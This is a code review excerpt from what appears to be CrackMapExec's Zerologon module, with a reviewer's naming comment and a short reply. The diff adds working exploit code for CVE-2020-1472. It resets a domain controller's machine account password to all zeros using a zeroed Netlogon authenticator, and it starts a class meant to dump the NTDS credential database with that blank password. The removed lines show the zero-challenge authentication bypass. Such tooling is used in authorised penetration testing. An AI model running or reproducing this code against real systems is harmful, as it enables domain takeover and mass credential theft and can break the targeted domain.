cme/modules/zerologon.py

```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
+            # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
+            if ex.get_error_code() == 0xC0000022:
+                return None
             else:
-                self.context.log.highlight("Attack failed. Target is probably patched.")
-        except DCERPCException as e:
-            self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!")
-
-def fail(msg):
-    cme_logger.debug(msg)
-    cme_logger.fail("This might have been caused by invalid arguments or network issues.")
-    sys.exit(2)
-
-def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):
-    # Connect to the DC's Netlogon service.
-
-    # Use an all-zero challenge and credential.
-    plaintext = b"\x00" * 8
-    ciphertext = b"\x00" * 8
-
-    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
-    flags = 0x212FFFFF
-
-    # Send challenge and authentication request.
-    nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext)
-    try:
-        server_auth = nrpc.hNetrServerAuthenticate3(
-            rpc_con,
-            dc_handle + "\x00",
-            target_computer + "$\x00",
-            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
-            target_computer + "\x00",
-            ciphertext,
-            flags,
+                self.logger.fail(f"Unexpected error code from DC: {ex.get_error_code()}.")
+        except BaseException as ex:
+            self.logger.fail(f"Unexpected error: {str(ex)}.")
+    
+    def zerologon_exploit(self, dce):
+        request = nrpc.NetrServerPasswordSet2()
+        request['PrimaryName'] = self.__dc_handle + '\x00'
+        request['AccountName'] = self.__target_computer + '$\x00'
+        request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = b'\x00' * 8
+        authenticator['Timestamp'] = 0
+        request['Authenticator'] = authenticator
+        request['ComputerName'] = self.__target_computer + '\x00'
+        request['ClearNewPassword'] = b'\x00' * 516
+        return dce.request(request)
+    
+class secretsdump_nano():
+    def __init__(self, logger, connection):
+        self.__remoteName = connection.host
+        self.__remoteHost = connection.host
+        self.__kdcHost = connection.kdcHost
+        self.__dcName = f"{connection.hostname}$"
+        self.__domain = connection.domain
+        self.__outputFileName=connection.output_filename
+        self.__hexpass = ""
+        self.logger = logger
+
+        domainParts = self.__domain.split('.')
+        baseDN = ''
+        for i in domainParts:
+            baseDN += 'dc=%s,' % i
+        # Remove last ','
+        self.__baseDN = baseDN[:-1]
+
+    def NTDSDump_BlankPass(self):
```

Comment:
Functions should be lowercase, so "ntdsdump_blankpass"

Reply:
Fixed!